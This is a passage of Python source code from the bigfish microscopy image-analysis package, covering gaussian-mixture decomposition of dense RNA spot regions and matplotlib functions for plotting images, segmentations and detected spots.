Coordinate of the spots detected out of dense regions, with shape
(nb_spots, 3) or (nb_spots, 2). One coordinate per dimension (zyx or
yx coordinates).
max_size : int
Maximum size of the regions.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_array(spots, ndim=2, dtype=np.int64)
stack.check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float),
beta=(int, float))
if beta < 0:
raise ValueError("'beta' should be a positive value, not {0}"
.format(beta))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing.".format(ndim))
if ndim == 3 and psf_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'psf_z' parameter is missing.".format(ndim))
if ndim != spots.shape[1]:
raise ValueError("Provided image has {0} dimensions but spots are "
"detected in {1} dimensions."
.format(ndim, spots.shape[1]))
if ndim == 2:
voxel_size_z, psf_z = None, None
# estimate median spot value and a threshold to detect dense regions
median_spot = build_reference_spot(
image,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
alpha=0.5)
threshold = int(median_spot.max() * beta)
# get connected regions
connected_regions = _get_connected_region(image, threshold)
# filter connected regions
(dense_regions, spots_out_region, max_size) = _filter_connected_region(
image, connected_regions, spots)
return dense_regions, spots_out_region, max_size
def _get_connected_region(image, threshold):
"""Find connected regions above a fixed threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
threshold : int or float
A threshold to detect peaks.
Returns
-------
cc : np.ndarray, np.int64
Image labelled with shape (z, y, x) or (y, x).
"""
# compute binary mask of the filtered image
mask = image > threshold
# find connected components
cc = label(mask)
return cc
def _filter_connected_region(image, connected_component, spots):
"""Filter dense and bright regions (defined as connected component
regions).
A candidate region has at least 2 connected pixels above a specific
threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
connected_component : np.ndarray, np.int64
Image labelled with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
Returns
-------
regions_filtered : np.ndarray
Array with filtered skimage.measure._regionprops._RegionProperties.
spots_out_region : np.ndarray, np.int64
Coordinate of the spots outside the regions with shape (nb_spots, 3)
or (nb_spots, 2).
max_region_size : int
Maximum size of the regions.
"""
# get properties of the different connected regions
regions = regionprops(connected_component, intensity_image=image)
# get different features of the regions
area = []
bbox = []
for i, region in enumerate(regions):
area.append(region.area)
bbox.append(region.bbox)
regions = np.array(regions)
area = np.array(area)
bbox = np.array(bbox)
# keep regions with a minimum size
big_area = area >= 2
regions_filtered = regions[big_area]
bbox_filtered = bbox[big_area]
# case where no region big enough were detected
if regions.size == 0:
regions_filtered = np.array([])
return regions_filtered, spots, 0
spots_out_region, max_region_size = _filter_spot_out_candidate_regions(
bbox_filtered, spots, nb_dim=image.ndim)
return regions_filtered, spots_out_region, max_region_size
def _filter_spot_out_candidate_regions(candidate_bbox, spots, nb_dim):
"""Filter spots out of the dense regions.
Parameters
----------
candidate_bbox : List[Tuple]
List of Tuples with the bounding box coordinates.
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
nb_dim : int
Number of dimensions to consider (2 or 3).
Returns
-------
spots_out_region : np.ndarray, np.int64
Coordinate of the spots outside the regions with shape (nb_spots, 3)
or (nb_spots, 2).
max_region_size : int
Maximum size of the regions.
"""
# initialization
mask_spots_out = np.ones(spots[:, 0].shape, dtype=bool)
max_region_size = 0
# get detected spots outside 3-d regions
if nb_dim == 3:
for box in candidate_bbox:
(min_z, min_y, min_x, max_z, max_y, max_x) = box
# get the size of the biggest region
size_z = max_z - min_z
size_y = max_y - min_y
size_x = max_x - min_x
max_region_size = max(max_region_size, size_z, size_y, size_x)
# get coordinates of spots inside the region
mask_spots_in = spots[:, 0] < max_z
mask_spots_in = (mask_spots_in & (spots[:, 1] < max_y))
mask_spots_in = (mask_spots_in & (spots[:, 2] < max_x))
mask_spots_in = (mask_spots_in & (min_z <= spots[:, 0]))
mask_spots_in = (mask_spots_in & (min_y <= spots[:, 1]))
mask_spots_in = (mask_spots_in & (min_x <= spots[:, 2]))
mask_spots_out = mask_spots_out & (~mask_spots_in)
# get detected spots outside 2-d regions
else:
for box in candidate_bbox:
(min_y, min_x, max_y, max_x) = box
# get the size of the biggest region
size_y = max_y - min_y
size_x = max_x - min_x
max_region_size = max(max_region_size, size_y, size_x)
# get coordinates of spots inside the region
mask_spots_in = spots[:, 0] < max_y
mask_spots_in = (mask_spots_in & (spots[:, 1] < max_x))
mask_spots_in = (mask_spots_in & (min_y <= spots[:, 0]))
mask_spots_in = (mask_spots_in & (min_x <= spots[:, 1]))
mask_spots_out = mask_spots_out & (~mask_spots_in)
# keep apart spots inside a region
spots_out_region = spots.copy()
spots_out_region = spots_out_region[mask_spots_out]
return spots_out_region, int(max_region_size)
# ### Gaussian simulation ###
def simulate_gaussian_mixture(image, candidate_regions, voxel_size_z=None,
voxel_size_yx=100, sigma_z=None, sigma_yx=200,
amplitude=100, background=0,
precomputed_gaussian=None):
"""Simulate as many gaussians as possible in the candidate dense regions in
order to get a more realistic number of spots.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
candidate_regions : np.ndarray
Array with filtered skimage.measure._regionprops._RegionProperties.
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d image.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
sigma_z : int or float or None
Standard deviation of the gaussian along the z axis, in nanometer. If
None, we consider a 2-d image.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in nanometer.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
Tuple with one tables of precomputed values for the erf, with shape
(nb_value, 2). One table per dimension.
Returns
-------
spots_in_regions : np.ndarray, np.int64
Coordinate of the spots detected inside dense regions, with shape
(nb_spots, 4) or (nb_spots, 3). One coordinate per dimension (zyx
or yx coordinates) plus the index of the region.
regions : np.ndarray, np.int64
Array with shape (nb_regions, 7) or (nb_regions, 6). One coordinate
per dimension for the region centroid (zyx or yx coordinates), the
number of RNAs detected in the region, the area of the region, its
average intensity value and its index.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_parameter(candidate_regions=np.ndarray,
voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
sigma_z=(int, float, type(None)),
sigma_yx=(int, float),
amplitude=float,
background=float)
if background < 0:
raise ValueError("Background value can't be negative: {0}"
.format(background))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing."
.format(ndim))
if ndim == 3 and sigma_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'sigma_z' parameter is missing.".format(ndim))
if ndim == 2:
voxel_size_z, sigma_z = None, None
# simulate gaussian mixtures in the candidate regions...
spots_in_regions = []
regions = []
# ... for 3-d regions...
if image.ndim == 3:
for i_region, region in enumerate(candidate_regions):
image_region, _, coord_gaussian = _gaussian_mixture_3d(
image,
region,
voxel_size_z,
voxel_size_yx,
sigma_z,
sigma_yx,
amplitude,
background,
precomputed_gaussian)
# get coordinates of spots and regions in the original image
box = region.bbox
(min_z, min_y, min_x, _, _, _) = box
coord = np.array(coord_gaussian, dtype=np.float64)
coord[:, 0] = (coord[:, 0] / voxel_size_z) + min_z
coord[:, 1] = (coord[:, 1] / voxel_size_yx) + min_y
coord[:, 2] = (coord[:, 2] / voxel_size_yx) + min_x
spots_in_region = np.zeros((coord.shape[0], 4), dtype=np.int64)
spots_in_region[:, :3] = coord
spots_in_region[:, 3] = i_region
spots_in_regions.append(spots_in_region)
region_z, region_y, region_x = tuple(coord[0])
nb_rna_region = coord.shape[0]
region_area = region.area
region_intensity = region.mean_intensity
regions.append([region_z, region_y, region_x, nb_rna_region,
region_area, region_intensity, i_region])
# ... or 2-d regions
else:
for i_region, region in enumerate(candidate_regions):
image_region, _, coord_gaussian = _gaussian_mixture_2d(
image,
region,
voxel_size_yx,
sigma_yx,
amplitude,
background,
precomputed_gaussian)
# get coordinates of spots and regions in the original image
box = region.bbox
(min_y, min_x, _, _) = box
coord = np.array(coord_gaussian, dtype=np.float64)
coord[:, 0] = (coord[:, 0] / voxel_size_yx) + min_y
coord[:, 1] = (coord[:, 1] / voxel_size_yx) + min_x
spots_in_region = np.zeros((coord.shape[0], 3), dtype=np.int64)
spots_in_region[:, :2] = coord
spots_in_region[:, 2] = i_region
spots_in_regions.append(spots_in_region)
region_y, region_x = tuple(coord[0])
nb_rna_region = coord.shape[0]
region_area = region.area
region_intensity = region.mean_intensity
regions.append([region_y, region_x, nb_rna_region,
region_area, region_intensity, i_region])
spots_in_regions = np.concatenate(spots_in_regions, axis=0)
regions = np.array(regions, dtype=np.int64)
return spots_in_regions, regions
def _gaussian_mixture_3d(image, region, voxel_size_z, voxel_size_yx, sigma_z,
sigma_yx, amplitude, background, precomputed_gaussian,
limit_gaussian=1000):
"""Fit as many 3-d gaussians as possible in a candidate region.
Parameters
----------
image : np.ndarray, np.uint
A 3-d image with detected spot and shape (z, y, x).
region : skimage.measure._regionprops._RegionProperties
Properties of a candidate region.
voxel_size_z : int or float
Height of a voxel, along the z axis, in nanometer.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
sigma_z : int or float
Standard deviation of the gaussian along the z axis, in pixel.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in pixel.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
Tuple with one tables of precomputed values for the erf, with shape
(nb_value, 2). One table per dimension.
limit_gaussian : int
Limit number of gaussian to fit into this region.
Returns
-------
image_region : np.ndarray, np.uint
A 3-d image with detected spots and shape (z, y, x).
best_simulation : np.ndarray, np.uint
A 3-d image with simulated spots and shape (z, y, x).
positions_gaussian : List[List]
List of positions (as a list [z, y, x]) for the different gaussian
simulations used in the mixture.
"""
# get an image of the region
box = tuple(region.bbox)
image_region = image[box[0]:box[3], box[1]:box[4], box[2]:box[5]]
image_region_raw = np.reshape(image_region, image_region.size)
image_region_raw = image_region_raw.astype(np.float64)
# build a grid to represent this image
grid = _initialize_grid_3d(image_region, voxel_size_z, voxel_size_yx)
# add a gaussian for each local maximum while the RSS decreases
simulation = np.zeros_like(image_region_raw)
residual = image_region_raw - simulation
ssr = np.sum(residual ** 2)
diff_ssr = -1
nb_gaussian = 0
best_simulation = simulation.copy()
positions_gaussian = []
while diff_ssr < 0 or nb_gaussian == limit_gaussian:
position_gaussian = np.argmax(residual)
positions_gaussian.append(list(grid[:, position_gaussian]))
simulation += gaussian_3d(grid=grid,
mu_z=float(positions_gaussian[-1][0]),
mu_y=float(positions_gaussian[-1][1]),
mu_x=float(positions_gaussian[-1][2]),
sigma_z=sigma_z,
sigma_yx=sigma_yx,
voxel_size_z=voxel_size_z,
voxel_size_yx=voxel_size_yx,
psf_amplitude=amplitude,
psf_background=background,
precomputed=precomputed_gaussian)
residual = image_region_raw - simulation
new_ssr = np.sum(residual ** 2)
diff_ssr = new_ssr - ssr
ssr = new_ssr
nb_gaussian += 1
background = 0
if diff_ssr < 0:
best_simulation = simulation.copy()
if 1 < nb_gaussian < limit_gaussian:
positions_gaussian.pop(-1)
elif nb_gaussian == limit_gaussian:
warnings.warn("Problem occurs during the decomposition of a dense "
"region. More than {0} spots seem to be necessary to "
"reproduce the candidate region and decomposition was "
"stopped early. Set a higher limit or check a potential "
"artifact in the image if you do not expect such a "
"large region to be decomposed.".format(limit_gaussian),
UserWarning)
best_simulation = np.reshape(best_simulation, image_region.shape)
max_value_dtype = np.iinfo(image_region.dtype).max
best_simulation = np.clip(best_simulation, 0, max_value_dtype)
best_simulation = best_simulation.astype(image_region.dtype)
return image_region, best_simulation, positions_gaussian
def _gaussian_mixture_2d(image, region, voxel_size_yx, sigma_yx, amplitude,
background, precomputed_gaussian,
limit_gaussian=1000):
"""Fit as many 2-d gaussians as possible in a candidate region.
Parameters
----------
image : np.ndarray, np.uint
        A 2-d image with detected spots and shape (y, x).
region : skimage.measure._regionprops._RegionProperties
Properties of a candidate region.
voxel_size_yx : int or float
        Size of a voxel on the yx plane, in nanometer.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in pixel.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
        Tuple with one table of precomputed values for the erf per dimension,
        each with shape (nb_value, 2).
limit_gaussian : int
        Maximum number of gaussians to fit into this region.
Returns
-------
image_region : np.ndarray, np.uint
A 2-d image with detected spots and shape (y, x).
best_simulation : np.ndarray, np.uint
A 2-d image with simulated spots and shape (y, x).
positions_gaussian : List[List]
List of positions (as a list [y, x]) for the different gaussian
simulations used in the mixture.
"""
# get an image of the region
box = tuple(region.bbox)
image_region = image[box[0]:box[2], box[1]:box[3]]
image_region_raw = np.reshape(image_region, image_region.size)
image_region_raw = image_region_raw.astype(np.float64)
# build a grid to represent this image
grid = _initialize_grid_2d(image_region, voxel_size_yx)
# add a gaussian for each local maximum while the RSS decreases
simulation = np.zeros_like(image_region_raw)
residual = image_region_raw - simulation
ssr = np.sum(residual ** 2)
diff_ssr = -1
nb_gaussian = 0
best_simulation = simulation.copy()
positions_gaussian = []
while diff_ssr < 0 or nb_gaussian == limit_gaussian:
position_gaussian = np.argmax(residual)
positions_gaussian.append(list(grid[:, position_gaussian]))
simulation += gaussian_2d(grid=grid,
mu_y=float(positions_gaussian[-1][0]),
mu_x=float(positions_gaussian[-1][1]),
sigma_yx=sigma_yx,
voxel_size_yx=voxel_size_yx,
psf_amplitude=amplitude,
psf_background=background,
precomputed=precomputed_gaussian)
residual = image_region_raw - simulation
new_ssr = np.sum(residual ** 2)
diff_ssr = new_ssr - ssr
ssr = new_ssr
nb_gaussian += 1
background = 0
if diff_ssr < 0:
best_simulation = simulation.copy()
if 1 < nb_gaussian < limit_gaussian:
positions_gaussian.pop(-1)
elif nb_gaussian == limit_gaussian:
warnings.warn("Problem occurs during the decomposition of a dense "
"region. More than {0} spots seem to be necessary to "
"reproduce the candidate region and decomposition was "
"stopped early. Set a higher limit or check a potential "
"artifact in the image if you do not expect such a "
"large region to be decomposed.".format(limit_gaussian),
UserWarning)
best_simulation = np.reshape(best_simulation, image_region.shape)
max_value_dtype = np.iinfo(image_region.dtype).max
best_simulation = np.clip(best_simulation, 0, max_value_dtype)
best_simulation = best_simulation.astype(image_region.dtype)
return image_region, best_simulation, positions_gaussian
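# --- Illustrative sketch (not part of the original bigfish code) ---
# The two mixture routines above share the same greedy strategy: place a
# gaussian at the current residual maximum and keep adding gaussians only
# while the sum of squared residuals (SSR) decreases. The toy function below
# replays that idea in 1-d with plain numpy; its name, signature and default
# values are hypothetical and only meant to clarify the stopping criterion.
def _greedy_gaussian_mixture_1d_sketch(signal, sigma=2.0, amplitude=1.0,
                                       limit_gaussian=100):
    x = np.arange(signal.size, dtype=np.float64)
    simulation = np.zeros(signal.size, dtype=np.float64)
    residual = signal - simulation
    ssr = np.sum(residual ** 2)
    positions = []
    for _ in range(limit_gaussian):
        # candidate position: the largest value left in the residual
        mu = np.argmax(residual)
        simulation = simulation + amplitude * np.exp(
            -0.5 * ((x - mu) / sigma) ** 2)
        residual = signal - simulation
        new_ssr = np.sum(residual ** 2)
        if new_ssr >= ssr:
            # adding this gaussian did not improve the fit: stop here
            break
        ssr = new_ssr
        positions.append(int(mu))
    return positions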
```
#### File: bigfish/plot/plot_images.py
```python
import warnings
import bigfish.stack as stack
from .utils import save_plot, get_minmax_values, create_colormap
import matplotlib.pyplot as plt
import numpy as np
from skimage.segmentation import find_boundaries
from matplotlib.colors import ListedColormap
from matplotlib.patches import RegularPolygon
# ### General plot ###
def plot_yx(image, r=0, c=0, z=0, rescale=False, contrast=False,
title=None, framesize=(8, 8), remove_frame=True, path_output=None,
ext="png", show=True):
"""Plot the selected yx plan of the selected dimensions of an image.
Parameters
----------
image : np.ndarray
A 2-d, 3-d, 4-d or 5-d image with shape (y, x), (z, y, x),
(c, z, y, x) or (r, c, z, y, x) respectively.
r : int
Index of the round to keep.
c : int
Index of the channel to keep.
z : int
Index of the z slice to keep.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3, 4, 5],
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_parameter(r=int, c=int, z=int,
rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# get the 2-d image
if image.ndim == 2:
xy_image = image
elif image.ndim == 3:
xy_image = image[z, :, :]
elif image.ndim == 4:
xy_image = image[c, z, :, :]
else:
xy_image = image[r, c, z, :, :]
# plot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
plt.imshow(xy_image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(xy_image)
else:
if xy_image.dtype not in [np.int64, bool]:
xy_image = stack.rescale(xy_image, channel_to_stretch=0)
plt.imshow(xy_image)
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
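# Hedged usage sketch (not part of the original module): display the middle
# z slice of a synthetic 3-d stack, only to show how the dimension indices
# are consumed by plot_yx.
def _example_plot_yx():
    rng = np.random.RandomState(0)
    image_3d = rng.randint(0, 255, size=(10, 64, 64)).astype(np.uint16)
    plot_yx(image_3d, z=5, title="middle z slice")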
def plot_images(images, rescale=False, contrast=False, titles=None,
framesize=(15, 10), remove_frame=True, path_output=None,
ext="png", show=True):
"""Plot or subplot of 2-d images.
Parameters
----------
images : np.ndarray or List[np.ndarray]
Images with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
titles : List[str]
Titles of the subplots.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# enlist image if necessary
if isinstance(images, np.ndarray):
images = [images]
# check parameters
stack.check_parameter(images=list,
rescale=bool,
contrast=bool,
titles=(str, list, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
for image in images:
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
# we plot 3 images by row maximum
nrow = int(np.ceil(len(images)/3))
ncol = min(len(images), 3)
# plot one image
if len(images) == 1:
if titles is not None:
title = titles[0]
else:
title = None
plot_yx(images[0],
rescale=rescale,
contrast=contrast,
title=title,
framesize=framesize,
remove_frame=remove_frame,
path_output=path_output,
ext=ext,
show=show)
return
# plot multiple images
fig, ax = plt.subplots(nrow, ncol, figsize=framesize)
# one row
if len(images) in [2, 3]:
for i, image in enumerate(images):
if remove_frame:
ax[i].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[i].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[i].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[i].imshow(image)
if titles is not None:
ax[i].set_title(titles[i], fontweight="bold", fontsize=10)
# several rows
else:
# we complete the row with empty frames
r = nrow * 3 - len(images)
images_completed = [image for image in images] + [None] * r
for i, image in enumerate(images_completed):
row = i // 3
col = i % 3
if image is None:
ax[row, col].set_visible(False)
continue
if remove_frame:
ax[row, col].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[row, col].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[row, col].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[row, col].imshow(image)
if titles is not None:
ax[row, col].set_title(titles[i],
fontweight="bold", fontsize=10)
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
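# Hedged usage sketch (not part of the original module): subplot three
# synthetic 2-d images, one title per image.
def _example_plot_images():
    rng = np.random.RandomState(0)
    images = [rng.randint(0, 255, size=(32, 32)).astype(np.uint8)
              for _ in range(3)]
    plot_images(images, titles=["image 1", "image 2", "image 3"])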
# ### Segmentation plot ###
def plot_segmentation(image, mask, rescale=False, contrast=False, title=None,
framesize=(15, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot result of a 2-d segmentation, with labelled instances if available.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
mask : np.ndarray
A 2-d image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list))
# plot
fig, ax = plt.subplots(1, 3, sharex='col', figsize=framesize)
# image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if title is not None:
ax[0].set_title(title, fontweight="bold", fontsize=10)
if remove_frame:
ax[0].axis("off")
# label
ax[1].imshow(mask)
if title is not None:
ax[1].set_title("Segmentation", fontweight="bold", fontsize=10)
if remove_frame:
ax[1].axis("off")
# superposition
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[2].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[2].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[2].imshow(image)
masked = np.ma.masked_where(mask == 0, mask)
ax[2].imshow(masked, cmap=ListedColormap(['red']), alpha=0.5)
if title is not None:
ax[2].set_title("Surface", fontweight="bold", fontsize=10)
if remove_frame:
ax[2].axis("off")
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
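# Hedged usage sketch (not part of the original module): overlay a binary
# mask on the synthetic image it was thresholded from.
def _example_plot_segmentation():
    rng = np.random.RandomState(0)
    image = rng.randint(0, 255, size=(64, 64)).astype(np.uint16)
    mask = image > 128
    plot_segmentation(image, mask, title="toy segmentation")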
def plot_segmentation_boundary(image, cell_label=None, nuc_label=None,
rescale=False, contrast=False, title=None,
framesize=(10, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot the boundary of the segmented objects.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
cell_label : np.ndarray
A 2-d image with shape (y, x).
nuc_label : np.ndarray
A 2-d image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
if cell_label is not None:
stack.check_array(cell_label,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
if nuc_label is not None:
stack.check_array(nuc_label,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# get boundaries
cell_boundaries = None
nuc_boundaries = None
if cell_label is not None:
cell_boundaries = find_boundaries(cell_label, mode='thick')
cell_boundaries = np.ma.masked_where(cell_boundaries == 0,
cell_boundaries)
if nuc_label is not None:
nuc_boundaries = find_boundaries(nuc_label, mode='thick')
nuc_boundaries = np.ma.masked_where(nuc_boundaries == 0,
nuc_boundaries)
# plot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
plt.imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
plt.imshow(image)
if cell_label is not None:
plt.imshow(cell_boundaries, cmap=ListedColormap(['red']))
if nuc_label is not None:
plt.imshow(nuc_boundaries, cmap=ListedColormap(['blue']))
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
def plot_segmentation_diff(image, mask_pred, mask_gt, rescale=False,
contrast=False, title=None, framesize=(15, 10),
remove_frame=True, path_output=None, ext="png",
show=True):
"""Plot segmentation results along with ground truth to compare.
Parameters
----------
image : np.ndarray, np.uint, np.int, np.float or bool
Image with shape (y, x).
mask_pred : np.ndarray, np.uint, np.int or np.float
Image with shape (y, x).
mask_gt : np.ndarray, np.uint, np.int or np.float
Image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str or None
Title of the plot.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str or None
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask_pred,
ndim=2,
dtype=[np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask_gt,
ndim=2,
dtype=[np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64,
bool])
# plot multiple images
fig, ax = plt.subplots(1, 3, figsize=framesize)
# image
if remove_frame:
ax[0].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if title is None:
ax[0].set_title("", fontweight="bold", fontsize=10)
else:
ax[0].set_title(title, fontweight="bold", fontsize=10)
# build colormap
cmap = create_colormap()
# prediction
im_mask_pred = np.ma.masked_where(mask_pred == 0, mask_pred)
if remove_frame:
ax[1].axis("off")
ax[1].imshow(im_mask_pred, cmap=cmap)
ax[1].set_title("Prediction", fontweight="bold", fontsize=10)
# ground truth
im_mask_gt = np.ma.masked_where(mask_gt == 0, mask_gt)
if remove_frame:
ax[2].axis("off")
ax[2].imshow(im_mask_gt, cmap=cmap)
ax[2].set_title("Ground truth", fontweight="bold", fontsize=10)
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# ### Detection plot ###
# TODO allow textual annotations
def plot_detection(image, spots, shape="circle", radius=3, color="red",
linewidth=1, fill=False, rescale=False, contrast=False,
title=None, framesize=(15, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot detected spots and foci on a 2-d image.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
spots : List[np.ndarray] or np.ndarray
Array with coordinates and shape (nb_spots, 3) or (nb_spots, 2). To
        plot different kinds of detected spots with different symbols, use a
        list of arrays.
    shape : List[str] or str
        List of symbols used to localize the detected spots in the image,
        among `circle`, `square` or `polygon`. One symbol per array in
        `spots`. If `shape` is a string, the same symbol is used for every
        element of `spots`.
    radius : List[int or float] or int or float
        List of yx radii of the detected spots. One radius per array in
        `spots`. If `radius` is a scalar, the same value is applied to every
        element of `spots`.
    color : List[str] or str
        List of colors of the detected spots. One color per array in `spots`.
        If `color` is a string, the same color is applied to every element
        of `spots`.
    linewidth : List[int] or int
        List of widths of the symbol borders. One integer per array in
        `spots`. If `linewidth` is an integer, the same width is applied to
        every element of `spots`.
